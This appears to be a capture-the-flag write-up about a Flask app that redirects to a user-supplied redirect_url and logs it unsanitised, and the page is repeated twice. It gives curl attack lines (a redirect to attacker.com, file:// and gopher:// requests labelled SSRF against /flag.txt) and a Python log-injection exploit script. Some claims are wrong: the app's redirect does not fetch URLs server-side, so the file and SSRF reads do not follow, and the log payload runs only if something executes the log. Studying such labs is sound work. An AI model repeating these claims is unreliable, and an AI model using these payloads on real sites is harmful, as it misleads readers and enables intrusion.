Challenge 1

Day 0 - 24/4/2025.

#!/usr/bin/env python3
#app.py
from flask import Flask, request, redirect, url_for
import logging

app = Flask(__name__)

logging.basicConfig(level=logging.INFO)

def is_authenticated_user():
    # This function checks if the user is authenticated and is omitted for brevity
   pass

@app.route('/')
def home():
    if not is_authenticated_user():
        logging.info('Unauthorized access attempt.')
        return redirect(url_for('login'))

    redirect_url = request.args.get('redirect_url')
    if redirect_url:
        logging.info(f'Redirecting to: {redirect_url}')
        return redirect(redirect_url)

    return 'Welcome to the home page!'

@app.route('/login')
def login():
    # Simulated login page
    return 'Login Page - User authentication goes here.'

if __name__ == '__main__':
    app.run(debug=False)

Vulnerability Analysis

Open Redirect Vulnerability
Log Poisoning Vulnerability

Open Redirect Vulnerability

The application accepts redirect_url parameter and redirect the user without proper validation. This allows attackers to redirect users to malicious websites.

curl http://challenge.ctf.example:5000?redirect_url=http://attacker.com/
curl "http://challenge-url:5000/?redirect_url=file:///flag.txt"

SSRF
curl "http://challenge-url:5000/?redirect_url=gopher:///flag.txt"

Log Poisoning Vulnerability

User input from redirect_url is directly logged without sanitization. This could allow injection of malicious data into log files

#!/usr/bin/env python3
import requests
import urllib.parse

# Target application URL
TARGET_URL = "http://localhost:5000"

# Log poisoning payload to create a log entry with CRLF injection
log_payload = "mywebsite.com\n\"\nimport os\nwith open('/flag.txt', 'r') as f:\n    print('FLAG: ' + f.read())\n\"\n"

# URL encode the payload
encoded_payload = urllib.parse.quote_plus(log_payload)

exploit_url = f"{TARGET_URL}/?redirect_url={encoded_payload}"

print("[+] Exploitation .....")
response = requests.get(exploit_url)
print(f"[+] Response status: {response.status_code}")
print("[+] Log should now be poisoned with code that will read flag.txt when processed")

Sample CTF Environment

PreviousSource Code Review NextCTF File

Last updated 2 days ago

#!/usr/bin/env python3 #app.py from flask import Flask, request, redirect, url_for import logging app = Flask(__name__) logging.basicConfig(level=logging.INFO) def is_authenticated_user(): # This function checks if the user is authenticated and is omitted for brevity pass @app.route('/') def home(): if not is_authenticated_user(): logging.info('Unauthorized access attempt.') return redirect(url_for('login')) redirect_url = request.args.get('redirect_url') if redirect_url: logging.info(f'Redirecting to: {redirect_url}') return redirect(redirect_url) return 'Welcome to the home page!' @app.route('/login') def login(): # Simulated login page return 'Login Page - User authentication goes here.' if __name__ == '__main__': app.run(debug=False)

Vulnerability Analysis

Open Redirect Vulnerability

Log Poisoning Vulnerability

Open Redirect Vulnerability

The application accepts redirect_url parameter and redirect the user without proper validation. This allows attackers to redirect users to malicious websites.

curl http://challenge.ctf.example:5000?redirect_url=http://attacker.com/
curl "http://challenge-url:5000/?redirect_url=file:///flag.txt"

SSRF
curl "http://challenge-url:5000/?redirect_url=gopher:///flag.txt"

Log Poisoning Vulnerability

User input from redirect_url is directly logged without sanitization. This could allow injection of malicious data into log files

#!/usr/bin/env python3
import requests
import urllib.parse

# Target application URL
TARGET_URL = "http://localhost:5000"

# Log poisoning payload to create a log entry with CRLF injection
log_payload = "mywebsite.com\n\"\nimport os\nwith open('/flag.txt', 'r') as f:\n    print('FLAG: ' + f.read())\n\"\n"

# URL encode the payload
encoded_payload = urllib.parse.quote_plus(log_payload)

exploit_url = f"{TARGET_URL}/?redirect_url={encoded_payload}"

print("[+] Exploitation .....")
response = requests.get(exploit_url)
print(f"[+] Response status: {response.status_code}")
print("[+] Log should now be poisoned with code that will read flag.txt when processed")